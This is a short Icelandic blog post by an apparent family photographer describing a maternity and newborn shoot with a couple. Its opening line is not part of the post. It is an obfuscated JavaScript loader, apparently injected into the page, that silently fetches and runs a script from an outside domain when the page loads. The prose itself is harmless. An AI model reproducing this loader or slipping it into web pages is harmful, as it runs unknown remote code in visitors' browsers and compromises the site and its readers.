;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn");
Það er virkilegur heiður þegar fólk velur mig til að mynda meðgöngu- og ungbarnamyndir fyrir sig. Stundum er það upphafið að okkar ferðalagi saman, en yfirleitt held ég áfram að mynda sama fólkið í gegnum árin. Ég fylgist með vexti fjölskyldunnar og smám saman verður það eins og fjölskylduvinir. Eins og það er með Jóhönnu og Magga.
Við ákváðum að hafa bumbumyndatökuna í þetta sinn aðeins öðruvísi og halda sama stíl eftir fæðingu.
Þetta er einn af nýju grunnunum mínum, mildur og fallegur sandlitur. Gleðin og tilhlökkunin eftir nýja barninu leynir sér ekki í svip hennar og eins móðurleg hlýjan þegar hún heldur nýfæddum syninum í fanginu.
Þau voru í skýjunum yfir myndunum.
Enda ekki hægt að meta það til fjár að eiga fallegar myndir af sjálfum sér með börnunum sínum.